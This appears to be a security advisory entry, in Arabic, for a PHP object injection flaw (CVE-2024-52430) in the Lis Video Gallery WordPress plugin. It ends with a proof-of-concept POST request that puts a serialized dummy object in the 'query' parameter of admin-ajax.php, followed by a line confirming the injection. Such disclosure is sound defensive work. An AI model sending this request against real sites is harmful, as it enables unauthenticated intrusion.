
Lis Video Gallery <= 0.2.1 - حقن كائن PHP غير مصادق عليه
Lis Video Gallery <= 0.2.1 - حقن كائن PHP غير موثّق
إن إضافة Lis Video Gallery لووردبريس معرضة لحقن كائن PHP في الإصدارات حتى 0.2.1 بما في ذلك، عبر إلغاء تسلسل المدخلات غير الموثوقة. وهذا يجعل من الممكن للمهاجمين غير الموثّقين حقن كائن PHP. لا توجد سلسلة POP معروفة في البرنامج المعرض للخطر. إذا كانت سلسلة POP موجودة من خلال إضافة أو قالب إضافي مثبت على النظام المستهدف، فقد تسمح للمهاجم بحذف الملفات بشكل تعسفي، أو استرجاع البيانات الحساسة، أو تنفيذ الأكواد.
CVE: CVE-2024-52430
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: lis-video-gallery
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
action=loadmore&query=O%3a20%3a%22PHP_Object_Injection%22%3a0%3a%7b%7d&page=1
PHP object injection has occurred.